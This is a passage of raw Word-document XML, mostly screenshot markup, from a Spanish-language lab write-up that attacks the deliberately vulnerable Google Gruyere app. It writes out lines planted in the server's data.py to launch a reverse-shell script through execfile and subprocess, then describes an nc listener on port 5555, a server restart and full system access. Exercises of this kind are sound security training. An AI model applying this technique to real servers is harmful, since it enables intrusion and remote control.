            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="278" name="Imagen 2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n 278" descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId284"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C790E1" w14:textId="3D0DB705" w:rsidR="00D97E7D" w:rsidRDefault="00D97E7D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="523305E5" w14:textId="05B137F4" w:rsidR="00D97E7D" w:rsidRDefault="00D97E7D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00D97E7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0094B6B4" wp14:editId="56EE0E8E">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="279" name="Imagen 27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n 279" descr="Interfaz de usuario gráfica, Texto, Aplicación, Chat o mensaje de texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId285"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABC415C" w14:textId="23246FB1" w:rsidR="00D97E7D" w:rsidRDefault="00D97E7D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DDAA26" w14:textId="657FBEF4" w:rsidR="00D97E7D" w:rsidRDefault="00D97E7D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FB591C4" w14:textId="54DFCA89" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2869DB96" w14:textId="6AEF4D08" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E4B01B" w14:textId="7B44E4DB" w:rsidR="00D97E7D" w:rsidRDefault="00D97E7D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0C98BA" w14:textId="77777777" w:rsidR="00D97E7D" w:rsidRDefault="00D97E7D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA2B5D8" w14:textId="2926E35B" w:rsidR="009201BB" w:rsidRDefault="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Después de hacer esto para que el ataque funcione tendremos que ejecutar este fichero, para esto tengo varias opciones, tendríamos </w:t>
      </w:r>
      <w:r w:rsidR="00D03FB7">
        <w:t>que,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sobre escribir cualquier archivo de configuración de Google Gruyere, y en ese archivo añadir esta línea </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECE343" w14:textId="77777777" w:rsidR="009201BB" w:rsidRDefault="009201BB" w:rsidP="009201BB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D19E0BB" w14:textId="4D143E31" w:rsidR="009201BB" w:rsidRPr="009201BB" w:rsidRDefault="00D97E7D" w:rsidP="009201BB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>execfile(“revershe_sell_no_args.py”)</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="001101FA">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00BC5177">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001101FA" w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="000260CB" w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>subprocess.call(['python','revershe_sell_no_args.py'])</w:t>
      </w:r>
      <w:r w:rsidR="001101FA" w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="00453E88">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DC0028">
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidR="00DC0028" w:rsidRPr="00857F50">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve">if path.exists("revershe_sell_no_args.py"):  </w:t>
      </w:r>
      <w:r w:rsidR="00DC0028" w:rsidRPr="009201BB">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>subprocess.Popen(['python','revershe_sell_no_args.py'],stdout=subprocess.PIPE)</w:t>
      </w:r>
      <w:r w:rsidR="00453E88" w:rsidRPr="009201BB">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDCBFF5" w14:textId="77777777" w:rsidR="009201BB" w:rsidRPr="009201BB" w:rsidRDefault="009201BB" w:rsidP="009201BB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF227EC" w14:textId="08BCDECB" w:rsidR="005557BE" w:rsidRDefault="009201BB" w:rsidP="009201BB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00453E88">
        <w:t>on esta línea ejecutaré la Shell reversa</w:t>
      </w:r>
      <w:r w:rsidR="005557BE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BBBB7B" w14:textId="77777777" w:rsidR="009201BB" w:rsidRDefault="009201BB" w:rsidP="009201BB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376E61A3" w14:textId="48DF2756" w:rsidR="00AA5398" w:rsidRDefault="00AA5398" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">También tendré que añadir: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA3A9F6" w14:textId="1F52F42F" w:rsidR="00AA5398" w:rsidRDefault="00AA5398" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>‘import subprocess’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8131C" w14:textId="197388A5" w:rsidR="00AA5398" w:rsidRDefault="00AA5398" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>‘import os’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F17E1F" w14:textId="44C39460" w:rsidR="00AA5398" w:rsidRDefault="00AA5398" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>‘from os import path’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2000F1" w14:textId="581C9E4C" w:rsidR="00087294" w:rsidRDefault="00087294" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00087294">
        <w:t>import subprocess’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA47D81" w14:textId="704FFE77" w:rsidR="00AA5398" w:rsidRDefault="00AA5398" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E1FFEF" w14:textId="6821D016" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7921698A" w14:textId="11DACD0B" w:rsidR="00AA5398" w:rsidRDefault="00AA5398" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F8E6DB" w14:textId="77F64732" w:rsidR="00AA5398" w:rsidRDefault="00AA5398" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Y un if para comprobar si el fichero existe</w:t>
      </w:r>
      <w:r w:rsidR="005A6F8F">
        <w:t>, esto sería opcional</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925C71B" w14:textId="550DC4A7" w:rsidR="00AA5398" w:rsidRDefault="00F433F7" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00AA5398" w:rsidRPr="00AA5398">
        <w:t>if path.exists("revershe_sell_no_args.py"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472DC3FA" w14:textId="1A4B4749" w:rsidR="00F433F7" w:rsidRDefault="00F433F7" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="000260CB">
        <w:t>subprocess.call(['python','revershe_sell_no_args.py'])</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FD2545" w14:textId="77777777" w:rsidR="00F433F7" w:rsidRDefault="00F433F7" w:rsidP="00AA5398">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA405D4" w14:textId="10537187" w:rsidR="005557BE" w:rsidRDefault="005557BE" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Visto esto elegiré para modificar el archivo</w:t>
      </w:r>
      <w:r w:rsidR="007057A9">
        <w:t xml:space="preserve"> data.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C37070E" w14:textId="16169B13" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C47EC75" w14:textId="13DFE37B" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Creo el archivo con esa línea:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16EF20" w14:textId="70CD811C" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00243D6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15FF3832" wp14:editId="5B66C2FE">
            <wp:extent cx="5400040" cy="5445125"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="281" name="Imagen 28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1" descr="Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId286"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5445125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF13A6" w14:textId="74A96408" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="216F701C" w14:textId="796B1FAB" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00D97E7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75278A8F" wp14:editId="49D14F47">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="280" name="Imagen 28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Interfaz de usuario gráfica, Aplicación, Word&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId287"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAAD564" w14:textId="3659A866" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289E2008" w14:textId="553F979D" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="000F041D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03A85188" wp14:editId="64789B99">
            <wp:extent cx="5400040" cy="4003675"/>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0040" cy="4003675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898516E" w14:textId="567890E6" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5B9A46" w14:textId="77777777" w:rsidR="000F041D" w:rsidRDefault="000F041D" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56CE8B91" w14:textId="7FA66333" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora lo subiré al servidor para sobre escribir el auténtico:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D389CC8" w14:textId="6FE364DE" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01A18C0B" w14:textId="3411CD77" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00243D6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2EDAEB" wp14:editId="30B82E36">
            <wp:extent cx="5399396" cy="3610304"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="282" name="Imagen 2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Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId289"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5408872" cy="3616640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A042CB7" w14:textId="7D344430" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5928F23A" w14:textId="2658C18F" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00243D6A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E671CC4" wp14:editId="65526E27">
            <wp:extent cx="5400040" cy="5842000"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="283" name="Imagen 2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Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId290"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5842000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36065A4D" w14:textId="2CC2FD29" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F76E8C8" w14:textId="4A38664B" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora comprobaré el cambio en el servidor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0998AB1A" w14:textId="40E8B8E5" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B0A08BA" w14:textId="0ED527DB" w:rsidR="00243D6A" w:rsidRDefault="00643BCB" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00643BCB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2266C504" wp14:editId="2489345E">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="290" name="Imagen 2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descr="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId291"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5F1F11" w14:textId="1F37A499" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B237C2" w14:textId="77777777" w:rsidR="00243D6A" w:rsidRDefault="00243D6A" w:rsidP="005557BE">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE660A3" w14:textId="663C7322" w:rsidR="005557BE" w:rsidRDefault="00D74D5C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez hecho esto, me cambiaré de usuario al ‘usuario’ y contraseña ‘usuario’, pues </w:t>
      </w:r>
      <w:r w:rsidR="00D03FB7">
        <w:t>él</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es administrador y puede r</w:t>
      </w:r>
      <w:r w:rsidR="003B7425">
        <w:t>einiciar el servidor, pero antes de eso en la máquina atacante usaré el comando nc para crear un socket que escuche por el puerto 5555:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D2633B" w14:textId="5D0E0F08" w:rsidR="003B7425" w:rsidRDefault="003B7425" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="003B7425">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05EA0DEE" wp14:editId="47F6AB15">
            <wp:extent cx="5400040" cy="2569210"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="285" name="Imagen 28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n 285" descr="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId292"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2569210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F638DE7" w14:textId="2947DB9E" w:rsidR="003B7425" w:rsidRDefault="003B7425" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C10A40" w14:textId="1E61DB5F" w:rsidR="003B7425" w:rsidRDefault="003B7425" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora si cambiaré de cuenta, y ejecutaré</w:t>
      </w:r>
      <w:r w:rsidR="00935B38">
        <w:t xml:space="preserve"> quitar el servidor, una vez se reinicie, tendré el control</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB58E3" w14:textId="024DDC01" w:rsidR="003B7425" w:rsidRDefault="003B7425" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FFDB62D" w14:textId="265BC91E" w:rsidR="003B7425" w:rsidRDefault="00935B38" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00935B38">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A3F3C8C" wp14:editId="58C1BA98">
            <wp:extent cx="5400040" cy="5479084"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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1460" cy="5480525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43C629" w14:textId="57A6534D" w:rsidR="002935CB" w:rsidRDefault="002935CB" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D69D3F" w14:textId="2A595A8B" w:rsidR="002935CB" w:rsidRDefault="002935CB" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Con esto conseguimos acceso completo al sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D5F98" w14:textId="29F91E71" w:rsidR="002935CB" w:rsidRDefault="002935CB" w:rsidP="003B7425">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
